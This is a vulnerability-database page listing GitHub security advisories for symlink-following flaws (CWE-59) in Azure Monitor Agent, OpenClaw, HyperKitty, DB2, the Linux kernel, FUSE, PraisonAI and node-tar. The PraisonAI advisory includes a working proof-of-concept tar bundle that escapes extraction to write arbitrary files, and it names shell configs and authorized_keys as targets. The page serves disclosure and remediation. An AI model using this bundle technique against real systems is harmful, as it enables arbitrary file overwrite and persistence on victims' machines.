Common Weakness Enumeration

CWE-59

Allowed

Improper Link Resolution Before File Access ('Link Following')

Abstraction: Base · Status: Draft

The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

1987 vulnerabilities reference this CWE, most recent first.

GHSA-9JW4-HXM9-MF52

Vulnerability from github – Published: 2024-06-11 18:30 – Updated: 2024-06-11 18:30
VLAI
Details

Azure Monitor Agent Elevation of Privilege Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-35254"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-11T17:16:03Z",
    "severity": "HIGH"
  },
  "details": "Azure Monitor Agent Elevation of Privilege Vulnerability",
  "id": "GHSA-9jw4-hxm9-mf52",
  "modified": "2024-06-11T18:30:50Z",
  "published": "2024-06-11T18:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35254"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-35254"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9MPH-4F7V-FMVH

Vulnerability from github – Published: 2026-03-04 19:02 – Updated: 2026-03-04 19:02
VLAI
Summary
OpenClaw has agent avatar symlink traversal in gateway session metadata
Details

Summary

A crafted local avatar path could follow a symlink outside the agent workspace and return arbitrary file contents as a base64 data: URL in gateway responses.

Impact

  • Confidentiality impact: local file read in the gateway process context.
  • Exfiltration path: agents.list can return the resulting avatarUrl payload.

Affected Components

  • src/gateway/session-utils.ts (resolveIdentityAvatarUrl)

Affected Packages / Versions

  • Package: openclaw (npm)
  • Introduced: v2026.1.21
  • Affected published versions: <= 2026.2.21-2
  • Planned patched version: 2026.2.22

Remediation

  • Resolve workspace and avatar paths with realpath and enforce realpath containment.
  • Open files with O_NOFOLLOW when available.
  • Compare pre-open and opened file identity (dev/ino) to block swap races.
  • Add regression tests for outside-workspace symlink rejection and in-workspace symlink allowance.

Fix Commit(s)

  • 3d0337504349954237d09e4d957df5cb844d5e77

OpenClaw thanks @aether-ai-agent for reporting.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.2.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-04T19:02:59Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\nA crafted local avatar path could follow a symlink outside the agent workspace and return arbitrary file contents as a base64 `data:` URL in gateway responses.\n\n## Impact\n- Confidentiality impact: local file read in the gateway process context.\n- Exfiltration path: `agents.list` can return the resulting `avatarUrl` payload.\n\n## Affected Components\n- `src/gateway/session-utils.ts` (`resolveIdentityAvatarUrl`)\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Introduced: `v2026.1.21`\n- Affected published versions: `\u003c= 2026.2.21-2`\n- Planned patched version: `2026.2.22`\n\n## Remediation\n- Resolve workspace and avatar paths with `realpath` and enforce realpath containment.\n- Open files with `O_NOFOLLOW` when available.\n- Compare pre-open and opened file identity (`dev`/`ino`) to block swap races.\n- Add regression tests for outside-workspace symlink rejection and in-workspace symlink allowance.\n\n## Fix Commit(s)\n- `3d0337504349954237d09e4d957df5cb844d5e77`\n\nOpenClaw thanks @aether-ai-agent for reporting.",
  "id": "GHSA-9mph-4f7v-fmvh",
  "modified": "2026-03-04T19:02:59Z",
  "published": "2026-03-04T19:02:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9mph-4f7v-fmvh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/3d0337504349954237d09e4d957df5cb844d5e77"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw has agent avatar symlink traversal in gateway session metadata"
}

GHSA-9P78-XGFP-85MW

Vulnerability from github – Published: 2022-05-24 19:04 – Updated: 2022-10-26 12:00
VLAI
Details

A UNIX Symbolic Link (Symlink) Following vulnerability in python-HyperKitty of openSUSE Leap 15.2, Factory allows local attackers to escalate privileges from the user hyperkitty or hyperkitty-admin to root. This issue affects: openSUSE Leap 15.2 python-HyperKitty version 1.3.2-lp152.2.3.1 and prior versions. openSUSE Factory python-HyperKitty versions prior to 1.3.4-5.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-25322"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59",
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-10T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "A UNIX Symbolic Link (Symlink) Following vulnerability in python-HyperKitty of openSUSE Leap 15.2, Factory allows local attackers to escalate privileges from the user hyperkitty or hyperkitty-admin to root. This issue affects: openSUSE Leap 15.2 python-HyperKitty version 1.3.2-lp152.2.3.1 and prior versions. openSUSE Factory python-HyperKitty versions prior to 1.3.4-5.1.",
  "id": "GHSA-9p78-xgfp-85mw",
  "modified": "2022-10-26T12:00:32Z",
  "published": "2022-05-24T19:04:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25322"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.suse.com/show_bug.cgi?id=1182373"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9P79-9G5P-R5V6

Vulnerability from github – Published: 2022-05-13 01:32 – Updated: 2022-05-13 01:32
VLAI
Details

IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local db2 instance owner to obtain root access by exploiting a symbolic link attack to read/write/corrupt a file that they originally did not have permission to access. IBM X-Force ID: 148803.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-1780"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-11-09T01:29:00Z",
    "severity": "HIGH"
  },
  "details": "IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local db2 instance owner to obtain root access by exploiting a symbolic link attack to read/write/corrupt a file that they originally did not have permission to access. IBM X-Force ID: 148803.",
  "id": "GHSA-9p79-9g5p-r5v6",
  "modified": "2022-05-13T01:32:42Z",
  "published": "2022-05-13T01:32:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1780"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148803"
    },
    {
      "type": "WEB",
      "url": "http://www.ibm.com/support/docview.wss?uid=ibm10733939"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105885"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1042086"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9PVV-PV37-92F4

Vulnerability from github – Published: 2022-05-13 01:23 – Updated: 2025-04-12 12:36
VLAI
Details

The mountpoint_last function in fs/namei.c in the Linux kernel before 3.15.8 does not properly maintain a certain reference count during attempts to use the umount system call in conjunction with a symlink, which allows local users to cause a denial of service (memory consumption or use-after-free) or possibly have unspecified other impact via the umount program.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2014-5045"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-08-01T11:13:00Z",
    "severity": "MODERATE"
  },
  "details": "The mountpoint_last function in fs/namei.c in the Linux kernel before 3.15.8 does not properly maintain a certain reference count during attempts to use the umount system call in conjunction with a symlink, which allows local users to cause a denial of service (memory consumption or use-after-free) or possibly have unspecified other impact via the umount program.",
  "id": "GHSA-9pvv-pv37-92f4",
  "modified": "2025-04-12T12:36:17Z",
  "published": "2022-05-13T01:23:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-5045"
    },
    {
      "type": "WEB",
      "url": "https://github.com/torvalds/linux/commit/295dc39d941dc2ae53d5c170365af4c9d5c16212"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1122472"
    },
    {
      "type": "WEB",
      "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=295dc39d941dc2ae53d5c170365af4c9d5c16212"
    },
    {
      "type": "WEB",
      "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=295dc39d941dc2ae53d5c170365af4c9d5c16212"
    },
    {
      "type": "WEB",
      "url": "http://rhn.redhat.com/errata/RHSA-2015-0062.html"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/60353"
    },
    {
      "type": "WEB",
      "url": "http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.15.8"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2014/07/24/2"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/68862"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-9Q28-GHCR-C4X3

Vulnerability from github – Published: 2026-05-11 13:59 – Updated: 2026-05-11 13:59
VLAI
Summary
PraisonAI's symlink-extraction bypass of `_safe_extractall` writes outside `dest_dir`
Details

Summary

The _safe_extractall helper that all recipe pull, recipe publish, and recipe unpack flows route through validates each archive member's name for absolute paths, .. segments, and resolved-path escape — but does not validate member.linkname, does not reject symlink/hardlink members, and calls tar.extractall(dest_dir) without filter="data". A bundle that contains a symlink with a name inside dest_dir but a linkname pointing outside it, followed by a regular file whose path traverses through the just-created symlink, escapes dest_dir and lets the attacker write arbitrary content to an attacker-chosen location on the victim's filesystem.

Affected paths

Every code path that calls _safe_extractall is exposed:

Caller File:line
praisonai recipe unpack src/praisonai/praisonai/cli/features/recipe.py:1175 (introduced as the fix for GHSA-99g3-w8gr-x37c)
LocalRegistry.unpack (recipe pull) src/praisonai/praisonai/recipe/registry.py:413
Registry archive validation (publish) src/praisonai/praisonai/recipe/registry.py:808

Root cause

recipe/registry.py:131-178:

def _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -> None:
    ...
    for member in tar.getmembers():
        ...
        member_path = Path(member.name)
        if member_path.is_absolute(): raise RegistryError(...)
        if '..' in member_path.parts: raise RegistryError(...)
        resolved = (dest_resolved / member_path).resolve()
        if not str(resolved).startswith(str(dest_resolved) + os.sep) and resolved != dest_resolved:
            raise RegistryError(...)
    # All members validated — safe to extract
    tar.extractall(dest_dir)

Three gaps:

  1. The loop checks only member.name. member.linkname (the symlink / hardlink target) is not inspected.
  2. member.issym() and member.islnk() are not used to refuse link members at all.
  3. tar.extractall(dest_dir) runs without filter="data". On Python ≤ 3.13 the default is fully_trusted (with a DeprecationWarning on 3.12+), which permits symlinks pointing outside dest_dir.

When the archive is extracted in member order, the symlink lands first, and any subsequent member whose path traverses through that symlink follows it to the attacker's chosen location.

Reproduction

Tested in a disposable container against praisonai==4.6.35 (pip install praisonai, no other modifications).

make_bundle.py:

import io, json, tarfile
manifest = json.dumps({"name": "legit", "version": "1.0.0"}).encode()
with tarfile.open("malicious.praison", "w:gz") as tar:
    info = tarfile.TarInfo("manifest.json"); info.size = len(manifest)
    tar.addfile(info, io.BytesIO(manifest))

    sym = tarfile.TarInfo("legit/escape")
    sym.type = tarfile.SYMTYPE
    sym.linkname = "/tmp/PWNED"
    tar.addfile(sym)

    payload = b"PWNED via symlink-extraction bypass of _safe_extractall\n"
    pf = tarfile.TarInfo("legit/escape/owned.txt"); pf.size = len(payload)
    tar.addfile(pf, io.BytesIO(payload))

direct_test.py:

import shutil, tarfile
from pathlib import Path
from praisonai.recipe.registry import _safe_extractall

DEST = Path("/work/recipes_direct")
shutil.rmtree(DEST, ignore_errors=True); DEST.mkdir(parents=True)
Path("/tmp/PWNED").mkdir(parents=True, exist_ok=True)

with tarfile.open("malicious.praison", "r:gz") as tar:
    _safe_extractall(tar, DEST)

assert Path("/tmp/PWNED/owned.txt").exists(), "did not escape"
print("PWNED:", Path("/tmp/PWNED/owned.txt").read_text())

Run:

docker run --rm -v "$PWD:/work" -w /work python:3.11-slim sh -c '
  pip install -q praisonai &&
  python make_bundle.py &&
  python direct_test.py
'

Observed output:

_safe_extractall returned cleanly
PWNED: PWNED via symlink-extraction bypass of _safe_extractall

/tmp/PWNED/owned.txt exists after the call returns, written outside the destination directory the helper was asked to extract into.

Impact

Arbitrary file write with attacker-controlled content to an attacker-chosen path, on every host that processes a malicious .praison bundle through any of the three callers above.

Realistic exploitation paths:

  • A user runs praisonai recipe unpack ./<malicious>.praison after obtaining the bundle from a shared registry, a tutorial link, or direct messaging.
  • A user runs praisonai recipe pull <name> against a malicious or compromised registry.
  • A registry server processes an uploaded .praison bundle (the publish path is reachable over the network if the server is exposed. per GHSA-r9x3-wx45-2v7f and GHSA-2xgv-5cv2-47vv).

Where the agent process runs as a regular user, the attacker can overwrite shell config (.bashrc, .zshrc, .profile), SSH authorized_keys, cron entries, or project files in adjacent directories. Where the process runs as root (registry-server deployments and some sudo-launched workflows), the attacker controls arbitrary system files.

This re-opens the recipe pull, recipe publish, and recipe unpack paths that GHSA-99g3-w8gr-x37c, GHSA-4rx4-4r3x-6534, GHSA-r9x3-wx45-2v7f, and GHSA-4ph2-f6pf-79wv were each intended to close.

Suggested remediation

Single-line fix at recipe/registry.py:178:

tar.extractall(dest_dir, filter="data")

filter="data" (introduced in Python 3.12; available as a backport on 3.8+ via the official PEP 706 reference implementation) refuses symlinks, hardlinks, device nodes, and absolute or escaping link targets, it is the canonical Python defense against this class. If you also support older Python, add an explicit guard inside the existing per-member loop before tar.extractall:

if member.issym() or member.islnk():
    link_target = (dest_resolved / member_path.parent / member.linkname).resolve()
    if member.linkname.startswith("/") or not str(link_target).startswith(str(dest_resolved) + os.sep):
        raise RegistryError(
            f"Refusing to extract link with target outside dest dir: "
            f"{member.name} -> {member.linkname}"
        )

Affected versions

praisonai >= 2.7.2 through current 4.6.35 (the helper exists at least back to the earliest path-traversal patch chain referenced in GHSA-99g3-w8gr-x37c). All releases that route extraction through _safe_extractall are exposed.

Disclosure

Reported privately via the project's GHSA workflow at https://github.com/MervinPraison/PraisonAI/security/advisories/new

-- Dhiral Vyas

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.6.36"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "PraisonAI"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.6.37"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44340"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T13:59:41Z",
    "nvd_published_at": "2026-05-08T14:16:47Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe `_safe_extractall` helper that all `recipe pull`, `recipe publish`, and `recipe unpack` flows route through validates each archive member\u0027s `name` for absolute paths, `..` segments, and resolved-path escape \u2014 but does **not** validate `member.linkname`, does not reject symlink/hardlink members, and calls `tar.extractall(dest_dir)` without `filter=\"data\"`. A bundle that contains a symlink with a name\ninside `dest_dir` but a `linkname` pointing outside it, followed by a regular file whose path traverses *through* the just-created symlink, escapes `dest_dir` and lets the attacker write arbitrary content to an attacker-chosen location on the victim\u0027s filesystem.\n\n## Affected paths\n\nEvery code path that calls `_safe_extractall` is exposed:\n\n| Caller | File:line |\n|---|---|\n| `praisonai recipe unpack` | `src/praisonai/praisonai/cli/features/recipe.py:1175` (introduced as the fix for GHSA-99g3-w8gr-x37c) |\n| `LocalRegistry.unpack` (recipe pull) | `src/praisonai/praisonai/recipe/registry.py:413` |\n| Registry archive validation (publish) | `src/praisonai/praisonai/recipe/registry.py:808` |\n\n## Root cause\n\n`recipe/registry.py:131-178`:\n\n```python\ndef _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -\u003e None:\n    ...\n    for member in tar.getmembers():\n        ...\n        member_path = Path(member.name)\n        if member_path.is_absolute(): raise RegistryError(...)\n        if \u0027..\u0027 in member_path.parts: raise RegistryError(...)\n        resolved = (dest_resolved / member_path).resolve()\n        if not str(resolved).startswith(str(dest_resolved) + os.sep) and resolved != dest_resolved:\n            raise RegistryError(...)\n    # All members validated \u2014 safe to extract\n    tar.extractall(dest_dir)\n```\n\nThree gaps:\n\n1. The loop checks only `member.name`. `member.linkname` (the symlink / hardlink target) is not inspected.\n2. `member.issym()` and `member.islnk()` are not used to refuse link members at all.\n3. `tar.extractall(dest_dir)` runs without `filter=\"data\"`. On Python \u2264 3.13 the default is `fully_trusted` (with a DeprecationWarning on 3.12+), which permits symlinks pointing outside `dest_dir`.\n\nWhen the archive is extracted in member order, the symlink lands first, and any subsequent member whose path traverses through that symlink follows it to the attacker\u0027s chosen location.\n\n## Reproduction\n\nTested in a disposable container against `praisonai==4.6.35` (`pip install praisonai`, no other modifications).\n\n`make_bundle.py`:\n\n```python\nimport io, json, tarfile\nmanifest = json.dumps({\"name\": \"legit\", \"version\": \"1.0.0\"}).encode()\nwith tarfile.open(\"malicious.praison\", \"w:gz\") as tar:\n    info = tarfile.TarInfo(\"manifest.json\"); info.size = len(manifest)\n    tar.addfile(info, io.BytesIO(manifest))\n\n    sym = tarfile.TarInfo(\"legit/escape\")\n    sym.type = tarfile.SYMTYPE\n    sym.linkname = \"/tmp/PWNED\"\n    tar.addfile(sym)\n\n    payload = b\"PWNED via symlink-extraction bypass of _safe_extractall\\n\"\n    pf = tarfile.TarInfo(\"legit/escape/owned.txt\"); pf.size = len(payload)\n    tar.addfile(pf, io.BytesIO(payload))\n```\n\n`direct_test.py`:\n\n```python\nimport shutil, tarfile\nfrom pathlib import Path\nfrom praisonai.recipe.registry import _safe_extractall\n\nDEST = Path(\"/work/recipes_direct\")\nshutil.rmtree(DEST, ignore_errors=True); DEST.mkdir(parents=True)\nPath(\"/tmp/PWNED\").mkdir(parents=True, exist_ok=True)\n\nwith tarfile.open(\"malicious.praison\", \"r:gz\") as tar:\n    _safe_extractall(tar, DEST)\n\nassert Path(\"/tmp/PWNED/owned.txt\").exists(), \"did not escape\"\nprint(\"PWNED:\", Path(\"/tmp/PWNED/owned.txt\").read_text())\n```\n\nRun:\n\n```bash\ndocker run --rm -v \"$PWD:/work\" -w /work python:3.11-slim sh -c \u0027\n  pip install -q praisonai \u0026\u0026\n  python make_bundle.py \u0026\u0026\n  python direct_test.py\n\u0027\n```\n\nObserved output:\n\n```\n_safe_extractall returned cleanly\nPWNED: PWNED via symlink-extraction bypass of _safe_extractall\n```\n\n`/tmp/PWNED/owned.txt` exists after the call returns, written outside the destination directory the helper was asked to extract into.\n\n## Impact\n\nArbitrary file write with attacker-controlled content to an attacker-chosen path, on every host that processes a malicious `.praison` bundle through any of the three callers above.\n\nRealistic exploitation paths:\n\n- A user runs `praisonai recipe unpack ./\u003cmalicious\u003e.praison` after obtaining the bundle from a shared registry, a tutorial link, or\n  direct messaging.\n- A user runs `praisonai recipe pull \u003cname\u003e` against a malicious or compromised registry.\n- A registry server processes an uploaded `.praison` bundle (the publish path is reachable over the network if the server is exposed. per GHSA-r9x3-wx45-2v7f and GHSA-2xgv-5cv2-47vv).\n\nWhere the agent process runs as a regular user, the attacker can overwrite shell config (`.bashrc`, `.zshrc`, `.profile`), SSH `authorized_keys`, cron entries, or project files in adjacent directories. Where the process runs as root (registry-server deployments and some `sudo`-launched workflows), the attacker controls arbitrary system files.\n\nThis re-opens the `recipe pull`, `recipe publish`, and `recipe unpack` paths that GHSA-99g3-w8gr-x37c, GHSA-4rx4-4r3x-6534, GHSA-r9x3-wx45-2v7f, and GHSA-4ph2-f6pf-79wv were each intended to close.\n\n## Suggested remediation\n\nSingle-line fix at `recipe/registry.py:178`:\n\n```python\ntar.extractall(dest_dir, filter=\"data\")\n```\n\n`filter=\"data\"` (introduced in Python 3.12; available as a backport on 3.8+ via the official PEP 706 reference implementation) refuses\nsymlinks, hardlinks, device nodes, and absolute or escaping link targets, it is the canonical Python defense against this class.\nIf you also support older Python, add an explicit guard inside the existing per-member loop before `tar.extractall`:\n\n```python\nif member.issym() or member.islnk():\n    link_target = (dest_resolved / member_path.parent / member.linkname).resolve()\n    if member.linkname.startswith(\"/\") or not str(link_target).startswith(str(dest_resolved) + os.sep):\n        raise RegistryError(\n            f\"Refusing to extract link with target outside dest dir: \"\n            f\"{member.name} -\u003e {member.linkname}\"\n        )\n```\n\n## Affected versions\n\n`praisonai \u003e= 2.7.2` through current `4.6.35` (the helper exists at least back to the earliest path-traversal patch chain referenced in\nGHSA-99g3-w8gr-x37c). All releases that route extraction through `_safe_extractall` are exposed.\n\n## Disclosure\n\nReported privately via the project\u0027s GHSA workflow at\nhttps://github.com/MervinPraison/PraisonAI/security/advisories/new\n\n-- Dhiral Vyas",
  "id": "GHSA-9q28-ghcr-c4x3",
  "modified": "2026-05-11T13:59:41Z",
  "published": "2026-05-11T13:59:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9q28-ghcr-c4x3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44340"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PraisonAI\u0027s symlink-extraction bypass of `_safe_extractall` writes outside `dest_dir`"
}

GHSA-9QWX-J72C-6HR4

Vulnerability from github – Published: 2022-05-13 01:13 – Updated: 2025-04-11 03:43
VLAI
Details

FUSE, possibly 2.8.5 and earlier, allows local users to create mtab entries with arbitrary pathnames, and consequently unmount any filesystem, via a symlink attack on the parent directory of the mountpoint of a FUSE filesystem, a different vulnerability than CVE-2010-0789.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2010-3879"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2011-01-22T22:00:00Z",
    "severity": "MODERATE"
  },
  "details": "FUSE, possibly 2.8.5 and earlier, allows local users to create mtab entries with arbitrary pathnames, and consequently unmount any filesystem, via a symlink attack on the parent directory of the mountpoint of a FUSE filesystem, a different vulnerability than CVE-2010-0789.",
  "id": "GHSA-9qwx-j72c-6hr4",
  "modified": "2025-04-11T03:43:19Z",
  "published": "2022-05-13T01:13:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3879"
    },
    {
      "type": "WEB",
      "url": "https://bugs.launchpad.net/bugs/670622"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.novell.com/show_bug.cgi?id=651598"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=651183"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/62986"
    },
    {
      "type": "WEB",
      "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=602333"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053792.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2010-November/077247.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2011-04/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "http://openwall.com/lists/oss-security/2010/11/04/8"
    },
    {
      "type": "WEB",
      "url": "http://openwall.com/lists/oss-security/2010/11/05/2"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/70520"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/42961"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/42965"
    },
    {
      "type": "WEB",
      "url": "http://www.halfdog.net/Security/FuseTimerace"
    },
    {
      "type": "WEB",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:155"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/44623"
    },
    {
      "type": "WEB",
      "url": "http://www.ubuntu.com/usn/USN-1045-1"
    },
    {
      "type": "WEB",
      "url": "http://www.ubuntu.com/usn/USN-1045-2"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2011/0181"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2011/0302"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-9R2W-394V-53QC

Vulnerability from github – Published: 2021-08-31 16:05 – Updated: 2021-08-31 16:01
VLAI
Summary
Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links
Details

Impact

Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution

node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.

This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both \ and / characters as path separators, however \ is a valid filename character on posix systems.

By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.

Additionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at FOO, followed by a symbolic link named foo, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but not from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the FOO directory would then be placed in the target of the symbolic link, thinking that the directory had already been created.

These issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7.

The v3 branch of node-tar has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of node-tar. If this is not possible, a workaround is available below.

Patches

4.4.16 || 5.0.8 || 6.1.7

Workarounds

Users may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links.

const tar = require('tar')

tar.x({
  file: 'archive.tgz',
  filter: (file, entry) => {
    if (entry.type === 'SymbolicLink') {
      return false
    } else {
      return true
    }
  }
})

Users are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves.

Fix

The problem is addressed in the following ways:

  1. All paths are normalized to use / as a path separator, replacing \ with / on Windows systems, and leaving \ intact in the path on posix systems. This is performed in depth, at every level of the program where paths are consumed.
  2. Directory cache pruning is performed case-insensitively. This may result in undue cache misses on case-sensitive file systems, but the performance impact is negligible.

Caveat

Note that this means that the entry objects exposed in various parts of tar's API will now always use / as a path separator, even on Windows systems. This is not expected to cause problems, as / is a valid path separator on Windows systems, but may result in issues if entry.path is compared against a path string coming from some other API such as fs.realpath() or path.resolve().

Users are encouraged to always normalize paths using a well-tested method such as path.resolve() before comparing paths to one another.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "4.4.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-37701"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-31T16:01:50Z",
    "nvd_published_at": "2021-08-31T17:15:00Z",
    "severity": "HIGH"
  },
